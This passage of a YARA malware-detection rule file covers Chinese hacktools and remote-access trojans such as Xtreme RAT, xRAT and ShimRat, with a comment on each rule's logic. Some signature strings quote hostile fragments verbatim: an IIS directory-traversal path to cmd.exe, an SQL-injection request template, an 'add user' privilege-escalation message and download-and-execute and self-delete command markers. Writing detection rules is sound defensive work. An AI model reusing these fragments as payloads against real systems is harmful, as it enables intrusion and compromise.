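        author = "Florian Roth"
        reference = "not set"
        date = "2015/01/19"
        hash = "56b476cba702a4423a2d805a412cae8ef4330905"
    strings:
        $s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
        $s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
        $s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
        $s8 = "Invalid IP." fullword ascii
        $s9 = "# scanning: " fullword ascii
        $s10 = "Unable to allocate socket." fullword ascii
    condition:
        2 of them
}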
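// tasksvr.exe: a DLL name, a process name and the "Beijing1" fragment
// (looks like a certificate subject component - unconfirmed). All three
// required; no MZ/filesize guard.
rule Hacktools_CN_Panda_tasksvr {
    meta:
        description = "Disclosed hacktool set - file tasksvr.exe"
        author = "Florian Roth"
        date = "17.11.14"
        score = 60
        hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
    strings:
        $s2 = "Consys21.dll" fullword ascii
        $s4 = "360EntCall.exe" fullword wide
        $s15 = "Beijing1" fullword ascii
    condition:
        all of them
}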
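// X-way.exe: wide strings that look like form/class names of the tool's UI
// (port scan, sniffer, crack, IIS shell) plus two SQL client symbols. Any 5
// of 9 are required behind an MZ/filesize guard.
rule x_way2_5_X_way {
    meta:
        description = "Chinese Hacktool Set - file X-way.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
    strings:
        $s0 = "TTFTPSERVERFRM" fullword wide
        $s1 = "TPORTSCANSETFRM" fullword wide
        $s2 = "TIISSHELLFRM" fullword wide
        $s3 = "TADVSCANSETFRM" fullword wide
        $s4 = "ntwdblib.dll" fullword ascii
        $s5 = "TSNIFFERFRM" fullword wide
        $s6 = "TCRACKSETFRM" fullword wide
        $s7 = "TCRACKFRM" fullword wide
        $s8 = "dbnextrow" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them
}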
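// netstat.exe from the toolset. Three of the four strings are annotated as
// occurring in goodware, so $s0 ("w03a2409.dll") together with the strict
// filesize bound is what distinguishes this sample from a legitimate
// netstat binary; expect the rule to be brittle across Windows builds.
rule Dos_netstat {
    meta:
        description = "Chinese Hacktool Set - file netstat.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
    strings:
        $s0 = "w03a2409.dll" fullword ascii
        $s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" fullword wide  /* Goodware String - occured 2 times */
        $s2 = "Administrative Status  = %1!u!" fullword wide  /* Goodware String - occured 2 times */
        $s3 = "Packet Too Big            %1!-10u!  %2!-10u!" fullword wide  /* Goodware String - occured 2 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 150KB and all of them
}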
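// AJunk.dll: the rule only keys on the module's own name in export table,
// version resource and description. Any PE that calls itself AJunk.dll will
// match, so treat a hit as a name match rather than a behavioral one.
rule PLUGIN_AJunk {
    meta:
        description = "Chinese Hacktool Set - file AJunk.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
    strings:
        $s1 = "AJunk.dll" fullword ascii
        $s2 = "AJunk.DLL" fullword wide
        $s3 = "AJunk Dynamic Link Library" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 560KB and all of them
}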
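// kelloworld.dll: the mimikatz "kelloworld" sample module. $s3 is the
// specific indicator; $s1 ("Hello World!") on its own is meaningless, which
// is why all three strings are required.
rule kelloworld_2 {
    meta:
        description = "Chinese Hacktool Set - file kelloworld.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
    strings:
        $s1 = "Hello World!" fullword wide
        $s2 = "kelloworld.dll" fullword ascii
        $s3 = "kelloworld de mimikatz pour Windows" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}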
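// GetPass.exe: several strings are truncated fragments ("GetLogonS",
// "EnableDebugPrivileg", "To Run As Administ"), which suggests the sample's
// strings were split or packed. The rule therefore pins this exact build;
// a recompiled variant is unlikely to keep the same fragment boundaries.
rule Dos_GetPass {
    meta:
        description = "Chinese Hacktool Set - file GetPass.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
    strings:
        $s0 = "GetLogonS" ascii
        $s3 = "/showthread.php?t=156643" ascii
        $s8 = "To Run As Administ" ascii
        $s18 = "EnableDebugPrivileg" fullword ascii
        $s19 = "sedebugnameValue" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 890KB and all of them
}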
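// racle.dll: debug format strings referencing kernel process-lookup
// routines (PsInitialSystemProcess, PsLookupProcessByProcessId) and a
// "FirstStage() Loaded" message. All four required.
rule Ms_Viru_racle {
    meta:
        description = "Chinese Hacktool Set - file racle.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
    strings:
        $s0 = "PsInitialSystemProcess @%p" fullword ascii
        $s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
        $s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
        $s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 210KB and all of them
}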
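// unknown.exe: an HTTP request template with a "__sql__" placeholder ($s2)
// is the distinctive string. $s3 (an old MSIE user agent) and $s5
// ("Host: 127.0.0.1") are common in benign software, hence 4 of 5 required.
rule Tools_unknown {
    meta:
        description = "Chinese Hacktool Set - file unknown.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
    strings:
        $s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
        $s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
        $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
        $s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
        $s5 = "Host: 127.0.0.1" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them
}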
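// cgis4.exe: auto-generated (yarGen) rule. The strings look like
// high-entropy fragments rather than meaningful text, there is no MZ or
// filesize guard, and the hash is 32 hex digits (MD5-length). Expect this to
// match only the exact sample and to miss any rebuild or repack.
rule cgis4_cgis4 {
    meta:
        description = "Auto-generated rule on file cgis4.exe"
        author = "yarGen Yara Rule Generator by Florian Roth"
        hash = "d658dad1cd759d7f7d67da010e47ca23"
    strings:
        $s0 = ")PuMB_syJ"
        $s1 = "&,fARW>yR"
        $s2 = "m3hm3t_rullaz"
        $s3 = "7Projectc1"
        $s4 = "Ten-GGl\""
        $s5 = "/Moziqlxa"
    condition:
        all of them
}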
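// ms11046.exe: privilege-escalation tool output strings ("Token system
// command", "Add to Administrators success"). Only 2 of 5 are needed and $s5
// is annotated as a goodware string, so one "[*] ..." message plus $s5 is
// enough for a hit - acceptable given how specific the "[*]" lines are.
rule GoodToolset_ms11046 {
    meta:
        description = "Chinese Hacktool Set - file ms11046.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
    strings:
        $s1 = "[*] Token system command" fullword ascii
        $s2 = "[*] command add user 90sec 90sec" fullword ascii
        $s3 = "[*] Add to Administrators success" fullword ascii
        $s4 = "[*] User has been successfully added" fullword ascii
        $s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii  /* Goodware String - occured 3 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 840KB and 2 of them
}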
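// sqlcmd.exe (SqlCmd2 "Inside Edition"): banner, usage and MSSQL shell
// messages. 4 of 7 required; no MZ/filesize guard, so a text dump of the
// tool's help would also match.
rule sig_238_sqlcmd {
    meta:
        description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
        author = "Florian Roth"
        date = "23.11.14"
        score = 40
        hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
    strings:
        $s0 = "Permission denial to EXEC command.:(" fullword ascii
        $s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
        $s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
        $s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
        $s6 = "SqlCmd2.exe Inside Edition." fullword ascii
        $s7 = "Http://www.patching.net  2000/12/14" fullword ascii
        $s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
    condition:
        4 of them
}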
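// epathobj_exp64.exe: PDB path and status messages of a kernel exploit
// build. Only 2 of 6 required while $s6 is a CRT string found in many
// binaries (annotated as occurring 96 times in goodware); $s6 plus the
// fairly generic $s1 would satisfy the condition, so review hits that lack
// $s2/$s3/$s4.
rule epathobj_exp64 {
    meta:
        description = "Chinese Hacktool Set - file epathobj_exp64.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
    strings:
        $s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
        $s2 = "Exploit ok run command" fullword ascii
        $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" fullword ascii
        $s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
        $s5 = "Mutex object did not timeout, list not patched" fullword ascii
        $s6 = "- inconsistent onexit begin-end variables" fullword wide  /* Goodware String - occured 96 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 150KB and 2 of them
}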
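// asp4.txt: ASP/VB source of a COM component that calls ExitWindowsEx with
// a request-supplied parameter. Strings are source-code lines (note the
// trailing spaces inside $s2 and $s5 and the "AceiveX" typo in $s7 - all
// literal, do not "fix" them). All eight required.
rule aspbackdoor_asp4 {
    meta:
        description = "Disclosed hacktool set (old stuff) - file asp4.txt"
        author = "Florian Roth"
        date = "23.11.14"
        score = 60
        hash = "faf991664fd82a8755feb65334e5130f791baa8c"
    strings:
        $s0 = "system.dll" fullword ascii
        $s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
        $s3 = "Public Function reboot(atype As Variant)" fullword ascii
        $s4 = "t& = ExitWindowsEx(1, atype)" ascii
        $s5 = "atype=request(\"atype\") " fullword ascii
        $s7 = "AceiveX dll" fullword ascii
        $s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
        $s10 = "sys.reboot(atype)" fullword ascii
    condition:
        all of them
}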
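// Blast.bat: $s1 ("@echo off") is in almost every batch file and adds no
// specificity; $s0 - a sql.exe invocation with an ip.txt target list - is
// the whole detection.
rule Hacktools_CN_Burst_Blast {
    meta:
        description = "Disclosed hacktool set - file Blast.bat"
        author = "Florian Roth"
        date = "17.11.14"
        score = 60
        hash = "b07702a381fa2eaee40b96ae2443918209674051"
    strings:
        $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
        $s1 = "@echo off" fullword ascii
    condition:
        all of them
}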
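// findoor.exe: an old IIS/SMTP probing tool. $s0 is a generic DOS-stub
// message; the SMTP "hacker@hacker.com" lines and the IIS unicode
// traversal request ($s9) are the specific part. 4 of 5 required, no
// MZ/filesize guard.
rule sig_238_findoor {
    meta:
        description = "Disclosed hacktool set (old stuff) - file findoor.exe"
        author = "Florian Roth"
        date = "23.11.14"
        score = 60
        hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
    strings:
        $s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
        $s8 = "PASS hacker@hacker.com" fullword ascii
        $s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
        $s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
        $s11 = "http://isno.yeah.net" fullword ascii
    condition:
        4 of them
}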
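// lcx.exe (HTran port forwarder): PDB path fragments, usage lines for the
// -tran/-slave/-listen modes and connection log messages. 2 of 12 suffices;
// the usage strings are distinctive enough that this is not a false-positive
// concern.
rule Dos_lcx {
    meta:
        description = "Chinese Hacktool Set - file lcx.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
    strings:
        // build-path fragments (split in two in the original)
        $s0 = "c:\\Users\\careful_snow\\" ascii
        $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
        $s3 = "[SERVER]connection to %s:%d error" fullword ascii
        $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
        $s7 = "[-] There is a error...Create a new connection." fullword ascii
        $s8 = "[+] Accept a Client on port %d from %s" fullword ascii
        $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s13 = "[+] Make a Connection to %s:%d...." fullword ascii
        $s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
        $s17 = "[+] Waiting another Client on port:%d...." fullword ascii
        $s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}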
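// iis7.exe: "\\localhost", "iis.run", a misspelled connect error and
// "WHOAMI". $s13 (WinSta0\Default) is a goodware string; all five are
// required, so it only narrows the match.
rule Dos_iis7 {
    meta:
        description = "Chinese Hacktool Set - file iis7.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
    strings:
        $s0 = "\\\\localhost" fullword ascii
        $s1 = "iis.run" fullword ascii
        $s3 = ">Could not connecto %s" fullword ascii
        $s5 = "WHOAMI" ascii
        $s13 = "WinSta0\\Default" fullword ascii  /* Goodware String - occured 22 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 140KB and all of them
}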
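// PassSniffer.exe: the strings are mangled fragments ("GetLas",
// "WSFtartup", "emcpysetprintf\") rather than readable text, which points
// to a packed/compressed sample. They pin this exact binary; do not expect
// the rule to generalize. No MZ/filesize guard.
rule PassSniffer {
    meta:
        description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
        author = "Florian Roth"
        date = "23.11.14"
        score = 60
        hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
    strings:
        $s2 = "Sniff" fullword ascii
        $s3 = "GetLas" fullword ascii
        $s4 = "VersionExA" fullword ascii
        $s10 = " Only RuntUZ" fullword ascii
        $s12 = "emcpysetprintf\\" fullword ascii
        $s13 = "WSFtartup" fullword ascii
    condition:
        all of them
}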
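// Packed/modified Windows Credential Editor build: "LSASS.EXE" and "_CREDS"
// are weak alone; "Using WCE " ties the match to the tool. All three
// required; no MZ guard, so memory dumps and scripts embedding the binary
// can also hit.
rule WCE_Modified_1_1014 {
    meta:
        description = "Modified (packed) version of Windows Credential Editor"
        author = "Florian Roth"
        hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
        score = 70
    strings:
        $s0 = "LSASS.EXE" fullword ascii
        $s1 = "_CREDS" ascii
        $s9 = "Using WCE " ascii
    condition:
        all of them
}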
// https://otx.alienvault.com/pulse/56606c974637f2388ab0972e
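// Xtreme RAT: a single 11-byte hex pattern - UTF-16LE "XTREME" without the
// final null byte. Matching on one short wide word is a known false-positive
// source (any file containing the word "XTREME" in UTF-16 matches); use it
// for triage alongside the other xtreme* rules rather than alone.
rule xtreme_rat : Trojan
{
    meta:
        author="Kevin Falcoz"
        date="23/02/2013"
        description="Xtreme RAT"

    strings:
        $signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/

    condition:
        $signature1
}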
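// Xtreme RAT - event-log flavour. The strings are a Windows Security
// auditing provider name, event IDs 5156/4688 and two file paths, so this
// appears to be meant for scanning exported event logs, not PE files.
// $type and $type1 are the same literal; "all of them" still requires the
// two event IDs and both paths to be present in the same input.
rule xtreme_rat_1
{
    meta:
        maltype = "Xtreme RAT"
        ref = "https://github.com/reed1713"
        reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"
    strings:
        $type="Microsoft-Windows-Security-Auditing"
        $eventid="5156"
        $data="windows\\system32\\sethc.exe"

        $type1="Microsoft-Windows-Security-Auditing"
        $eventid1="4688"
        $data1="AppData\\Local\\Temp\\Microsoft Word.exe"
    condition:
        all of them
}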
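// Identical in strings and condition to xtreme_rat_1 (only the "ref" meta
// differs); kept for compatibility with consumers that reference this
// name. Both rules will fire together on the same input.
rule xtreme_rat_0
{
    meta:
        maltype = "Xtreme RAT"
        reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"
    strings:
        $type="Microsoft-Windows-Security-Auditing"
        $eventid="5156"
        $data="windows\\system32\\sethc.exe"

        $type1="Microsoft-Windows-Security-Auditing"
        $eventid1="4688"
        $data1="AppData\\Local\\Temp\\Microsoft Word.exe"
    condition:
        all of them
}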
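// XtremeRAT identifying strings, "any of them". The second string is a
// GCC/MinGW runtime identifier and will be present in other MinGW-built
// binaries, so that half of the rule is a toolchain indicator rather than a
// family indicator; corroborate with XtremeRATCode before acting on a hit.
rule XtremeRATStrings : XtremeRAT Family
{
    meta:
        description = "XtremeRAT Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-09"

    strings:
        $ = "dqsaazere"
        $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"

    condition:
        any of them
}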
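// Xtreme RAT: product/feature names and Delphi unit names, 5 of 12.
// Each pattern is a regex whose only regex feature is a one-character
// group, e.g. /(X)tremeRAT/; functionally this is the literal string. The
// grouping is presumably there so the rule file does not match itself when
// scanned (unconfirmed) - keep it rather than "simplifying" to plain strings.
rule Xtreme
{
    meta:
        description = "Xtreme RAT"
        author = "botherder https://github.com/botherder"

    strings:
        $string1 = /(X)tremeKeylogger/ wide ascii
        $string2 = /(X)tremeRAT/ wide ascii
        $string3 = /(X)TREMEUPDATE/ wide ascii
        $string4 = /(S)TUBXTREMEINJECTED/ wide ascii

        $unit1 = /(U)nitConfigs/ wide ascii
        $unit2 = /(U)nitGetServer/ wide ascii
        $unit3 = /(U)nitKeylogger/ wide ascii
        $unit4 = /(U)nitCryptString/ wide ascii
        $unit5 = /(U)nitInstallServer/ wide ascii
        $unit6 = /(U)nitInjectServer/ wide ascii
        $unit7 = /(U)nitBinder/ wide ascii
        $unit8 = /(U)nitInjectProcess/ wide ascii

    condition:
        5 of them
}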
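// XtremeRAT code features: two opcode patterns, both required. The first
// (call rel32; fstp st) is only 7 bytes and common in x87 code; the second
// - a run of byte-wise stack stores - is what carries the specificity.
rule XtremeRATCode : XtremeRAT Family
{
    meta:
        description = "XtremeRAT code features"
        author = "Seth Hardy"
        last_modified = "2014-07-09"

    strings:
        // call; fstp st
        $ = { E8 ?? ?? ?? ?? DD D8 }
        // hiding string
        $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }

    condition:
        all of them
}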
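// Xtreme RAT v3.5 in memory: wide strings for the mutex/command names,
// the registry key, the version banner and the product name. 2 of 8;
// filetype "memory" indicates it was written for process dumps.
rule xtremrat : rat
{
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "Xtrem RAT v3.5"
        date = "2012-07-12"
        version = "1.0"
        filetype = "memory"

    strings:
        $a = "XTREME" wide
        $b = "XTREMEBINDER" wide
        $c = "STARTSERVERBUFFER" wide
        $d = "SOFTWARE\\XtremeRAT" wide
        $e = "XTREMEUPDATE" wide
        $f = "XtremeKeylogger" wide
        $g = "myversion|3.5" wide
        $h = "xtreme rat" wide nocase
    condition:
        2 of them
}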
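// xRAT 2.0 (.NET): mostly metadata/member names, so the rule requires all
// 18 strings ("18 of them" == all of them). The original meta listed hash1
// twice with the same value and had no hash6/hash7; the duplicate entry is
// dropped here, the gap is left as-is (the missing values are not known).
rule xRAT20 : RAT
{
    meta:
        author = "Rottweiler"
        date = "2015-08-20"
        description = "Identifies xRAT 2.0 samples"
        maltype = "Remote Access Trojan"
        hash0 = "cda610f9cba6b6242ebce9f31faf5d9c"
        hash1 = "60d7b0d2dfe937ac6478807aa7043525"
        hash2 = "d1b577fbfd25cc5b873b202cfe61b5b8"
        hash3 = "1820fa722906569e3f209d1dab3d1360"
        hash4 = "8993b85f5c138b0afacc3ff04a2d7871"
        hash5 = "0c231ed8a800b0f17f897241f1d5f4e3"
        // hash6 / hash7 were absent in the original rule
        hash8 = "2c198e3e0e299a51e5d955bb83c62a5e"
        sample_filetype = "exe"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0 = "GetDirectory: File not found" wide
        $string1 = "<>m__Finally8"
        $string2 = "Secure"
        $string3 = "ReverseProxyClient"
        $string4 = "DriveDisplayName"
        $string5 = "<IsError>k__BackingField"
        $string6 = "set_InstallPath"
        $string7 = "memcmp"
        $string8 = "urlHistory"
        $string9 = "set_AllowAutoRedirect"
        $string10 = "lpInitData"
        $string11 = "reader"
        $string12 = "<FromRawDataGlobal>d__f"
        $string13 = "mq.png" wide
        $string14 = "remove_KeyDown"
        $string15 = "ProtectedData"
        $string16 = "m_hotkeys"
        $string17 = "get_Hour"
        $string18 = "\\mozglue.dll" wide
    condition:
        18 of them
}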
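// xRAT: two version-specific string sets. $v1* (older build: method names
// plus a UTF-16 "RT_RCDATA" hex pattern) or $v2* (.NET property backing
// fields and the ping-based self-delete command line). All of one set is
// required, which keeps the generic names like "DataIn" from matching alone.
rule xRAT : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/xRat"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $v1a = "DecodeProductKey"
        $v1b = "StartHTTPFlood"
        $v1c = "CodeKey"
        $v1d = "MESSAGEBOX"
        $v1e = "GetFilezillaPasswords"
        $v1f = "DataIn"
        $v1g = "UDPzSockets"
        $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}

        $v2a = "<URL>k__BackingField"
        $v2b = "<RunHidden>k__BackingField"
        $v2c = "DownloadAndExecute"
        $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
        $v2e = "england.png" wide
        $v2f = "Showed Messagebox" wide
    condition:
        all of ($v1*) or all of ($v2*)
}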
// https://otx.alienvault.com/pulse/596f7b2e2d213739405a8563
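// jRAT configuration in memory: one bounded regex (port=<1-5 digits>SPLIT).
// The {1,5} quantifier keeps the regex cheap; the "SPLIT" suffix is the
// config delimiter used by the referenced extractor.
rule jRAT_conf : RAT
{
    meta:
        description = "jRAT configuration"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-10-11"
        filetype = "memory"
        version = "1.0"
        ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py"
        ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html"

    strings:
        $a = /port=[0-9]{1,5}SPLIT/

    condition:
        $a
}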
// https://otx.alienvault.com/pulse/5554d25fb45ff55e06641987
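// APT17 FXSST.DLL side-loading sample. Note on $x1: the "?" characters look
// like a lossy replacement of non-ASCII characters (likely the registered
// trademark sign in the version resource). In a YARA text string "?" is a
// literal question mark, not a wildcard, so $x1 as written probably never
// matches the real version string and the "1 of ($x*)" branch is carried by
// $x2 alone. The $s* set is generic Win32 API names and is only a filter.
rule APT17_Sample_FXSST_DLL
{
    meta:
        description = "Detects Samples related to APT17 activity - file FXSST.DLL"
        author = "Florian Roth"
        reference = "https://goo.gl/ZiJyQv"
        date = "2015-05-14"
        hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"

    strings:
        $x1 = "Microsoft? Windows? Operating System" fullword wide
        $x2 = "fxsst.dll" fullword ascii
        $y1 = "DllRegisterServer" fullword ascii
        $y2 = ".cSV" fullword ascii
        $s1 = "GetLastActivePopup"
        $s2 = "Sleep"
        $s3 = "GetModuleFileName"
        $s4 = "VirtualProtect"
        $s5 = "HeapAlloc"
        $s6 = "GetProcessHeap"
        $s7 = "GetCommandLine"

    condition:
        uint16(0) == 0x5a4d and filesize < 800KB and ( 1 of ($x*) or all of ($y*) ) and all of ($s*)
}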
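// ZXProxy: a registry/control path, a download URL and a log message;
// any one string is enough. No meta description or date was given by the
// author.
rule ZXProxy
{
    meta:
        author = "ThreatConnect Intelligence Research Team"

    strings:
        $C = "\\Control\\zxplug" nocase wide ascii
        $h = "http://www.facebook.com/comment/update.exe" wide ascii
        $S = "Shared a shell to %s:%s Successfully" nocase wide ascii
    condition:
        any of them
}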
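// ZoxPNG RAT: single long URL query string used as the beacon URI. One
// exact string, so trivially evaded by changing the URI, but very unlikely
// to false-positive.
rule zoxPNG_RAT
{
    meta:
        Author      = "Novetta Advanced Research Group"
        Date        = "2014/11/14"
        Description = "ZoxPNG RAT, url inside"
        Reference   = "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"

    strings:
        $url = "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58"

    condition:
        $url
}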
// https://otx.alienvault.com/pulse/58cdc54005e78502c2c2fac1
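// Shell Crew notepad.exe trojan: $s1/$s2 are 32-hex-digit strings embedded
// in the sample (they look like MD5 values - unconfirmed); either one hits.
// The meta "MD5" is the sample hash, distinct from the two string values.
rule TROJAN_Notepad_shell_crew : Trojan {
    meta:
        author = "RSA_IR"
        Date     = "4Jun13"
        File     = "notepad.exe v 1.1"
        MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
    strings:
        $s1 = "75BAA77C842BE168B0F66C42C7885997"
        $s2 = "B523F63566F407F3834BCC54AAA32524"
    condition:
        $s1 or $s2
}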
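// Terminator RAT in memory: the misspelled "Accelorator" marker and a fixed
// HTML fragment used by the C2 channel. Both required.
rule TerminatorRat : RAT
{
    meta:
        description = "Terminator RAT"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-10-24"
        filetype = "memory"
        version = "1.0"
        ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html"

    strings:
        $a = "Accelorator"
        $b = "<html><title>12356</title><body>"

    condition:
        all of them
}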
// https://otx.alienvault.com/pulse/5977c728a87db76e38caeede
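// ShimRatReporter: the eight "*-INFO" report section headers, a MAC address
// format string, a proxy-environment message and two API names. All twelve
// required, which makes the individual generic items (format string, API
// names) safe.
rule shimratreporter: RAT
{
    meta:
        description = "Detects ShimRatReporter"
        author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
        date = "20/11/2015"
        ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"

    strings:
        $IpInfo = "IP-INFO"
        $NetworkInfo = "Network-INFO"
        $OsInfo = "OS-INFO"
        $ProcessInfo = "Process-INFO"
        $BrowserInfo = "Browser-INFO"
        $QueryUserInfo = "QueryUser-INFO"
        $UsersInfo = "Users-INFO"
        $SoftwareInfo = "Software-INFO"
        $AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
        $proxy_str = "(from environment) = %s"

        $netuserfun = "NetUserEnum"
        $networkparams = "GetNetworkParams"

    condition:
        all of them
}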
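// ShimRat and its loader: four alternative string groups. $dll/$dat are
// near-universal substrings and only act as anchors inside groups 1 and 4;
// the keyboard-row signatures ($headersig/$datasig), the Data$$ markers, the
// ping-delay command template and the shim export names provide the
// specificity of each branch.
rule shimrat: RAT
{
    meta:
        description = "Detects ShimRat and the ShimRat loader"
        author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
        date = "20/11/2015"
        ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"

    strings:
        $dll = ".dll"
        $dat = ".dat"
        $headersig = "QWERTYUIOPLKJHG"
        $datasig = "MNBVCXZLKJHGFDS"
        $datamarker1 = "Data$$00"
        $datamarker2 = "Data$$01%c%sData"
        $cmdlineformat = "ping localhost -n 9 /c %s > nul"
        $demoproject_keyword1 = "Demo"
        $demoproject_keyword2 = "Win32App"
        $comspec = "COMSPEC"
        $shim_func1 = "ShimMain"
        $shim_func2 = "NotifyShims"
        $shim_func3 = "GetHookAPIs"

    condition:
        ($dll and $dat and $headersig and $datasig) or ($datamarker1 and $datamarker2) or ($cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec) or ($dll and $dat and $shim_func1 and $shim_func2 and $shim_func3)
}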
// https://otx.alienvault.com/pulse/588a66cae4166d1290244b9a
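// Kraken bot (inf.bin): C2 query fragments plus two base64 fragments of
// environment-variable names (decoded in the inline comments). All five
// required behind an MZ check; no filesize bound.
rule Kraken_Bot_Sample : bot {
    meta:
        description = "Kraken Bot Sample - file inf.bin"
        author = "Florian Roth"
        reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
        date = "2015-05-07"
        hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
        score = 90
    strings:
        $s2 = "%s=?getname" fullword ascii
        $s4 = "&COMPUTER=^" fullword ascii
        $s5 = "xJWFwcGRhdGElAA=" fullword ascii /* base64 encoded string '%appdata%' */
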